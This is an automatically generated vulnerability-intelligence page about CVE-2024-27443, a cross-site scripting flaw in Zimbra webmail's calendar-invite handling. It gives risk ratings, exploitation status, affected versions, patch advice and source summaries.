🟢 CVE-2024-27443

This is a Cross-Site Scripting (XSS) vulnerability in Zimbra webmail that requires sending a malicious email with crafted calendar headers to victims. While Zimbra is internet-facing, this XSS only compromises user sessions, not the server itself, making it a phishing attack rather than direct server exploitation.

← Back to Overview
LOW_RISK
Risk Level
6.1
CVSS Score
NETWORK
Attack Vector
Execution
ATT&CK Tactic
T1203 — Exploitation for Client Execution
ATT&CK Technique
HIGH
Deployment Risk
No
Ransomware

📋 Vulnerability Details

Data Source: CIRCL

Confidence: HIGH

Exploitation Method: PHISHING

CVE Published: 2024-08-12

Added to CISA KEV: 2025-05-19 280 DAYS BETWEEN CVE AND KEV

🎯 Recommendations:

🔍 Web Intelligence (Kagi · 2026-06-04)

CVE-2024-27443 is a Cross-Site Scripting (XSS) vulnerability affecting the CalendarInvite feature of the Zimbra Collaboration Suite (ZCS) classic webmail user interface [1] [5].

Exploitation and Threat Actor Activity
  • Active Exploitation: The vulnerability is confirmed to be exploited in the wild [2] [5].
  • Targeting: It has been observed targeting government entities and defense companies [4].
  • CISA KEV: Due to confirmed active exploitation, it was added to the CISA Known Exploited Vulnerabilities (KEV) catalog on May 19, 2025 [2] [5].
Attack Method and Requirements
  • Attack Vector: Remote. An attacker can exploit this by sending an email message containing a specially crafted calendar header that embeds an XSS payload [1]?lang=en?kagi_q=CVE-2024-27443+details+exploitation+impact+patch+status.
  • User Interaction: Required. The payload executes when a victim views the malicious email using the Zimbra webmail classic interface?lang=en?kagi_q=CVE-2024-27443+details+exploitation+impact+patch+status.
Impact
  • Access/Impact: Successful exploitation allows for the execution of arbitrary JavaScript code within the context of the victim's session?lang=en?kagi_q=CVE-2024-27443+details+exploitation+impact+patch+status [3]. This can lead to session hijacking, unauthorized actions on behalf of the user, or data theft.
Affected Versions and Mitigation
  • Affected Versions: Zimbra Collaboration (ZCS) versions 9.0 and 10.0 are affected [1] [5].
  • Mitigation: Organizations are advised to update to the latest available patch provided by the vendor to remediate the vulnerability [2].

Sources

  1. CVE-2024-27443 Detail - NVD

    A Cross-Site Scripting (XSS) vulnerability exists in the CalendarInvite feature of the Zimbra webmail classic user interface, because of improper input ... CVE-2024-27443 Detail Description An issue was discovered in Zimbra Collaboration (ZCS) 9.0 and 10.0. A Cross-Site Scripting (XSS) vulnerability…

  2. Synacor Zimbra Collaboration Suite XSS Vulnerability (CVE-2024 ...

    As described in a blog post by ESET Research, this vulnerability is currently being exploited in the wild and is found to be targeting government entities and ... CVE-2024-27443 is a vulnerability affecting Zimbra Collaboration. As described in a blog post by ESET Research, this vulnerability is cur…

  3. Known Exploited Vulnerabilities Catalog | CISA

    CVE-2026-45498. Microsoft Defender Denial of Service Vulnerability: Microsoft Defender contains an unspecified vulnerability that allows for denial of service. ... CVE-2024-27443. Synacor Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Vulnerability: Zimbra Collaboration contains a cross…

  4. SecurityScorecard Advisory: Synacor Zimbra Collaboration Suite XSS...

    CVE-2024-27443 is a vulnerability affecting Zimbra Collaboration. As described in a blog post by ESET Research, this vulnerability is currently being exploited in the wild and is found to be targeting government entities and defense companies. On May 19, 2025, this vulnerability was added to CISA’s…

  5. CISA Adds Zimbra Collaboration Vulnerability (CVE-2024-27443) to...

    CVE-2024-27443 is an actively exploited XSS vulnerability in the Zimbra Collaboration Suite (ZCS), affecting versions 9.0 and 10.0. The flaw resides in the CalendarInvite feature of the Zimbra webmail classic UI.Date Added to CISA KEV: May 19, 2025 Exploitation Status: Confirmed in the wild Severity…

Generated by PatchNow Intelligence System

Analysis based on CIRCL.LU data, Claude AI assessment, and MITRE ATT&CK framework

📄 Download JSON Data | 📡 RSS Feed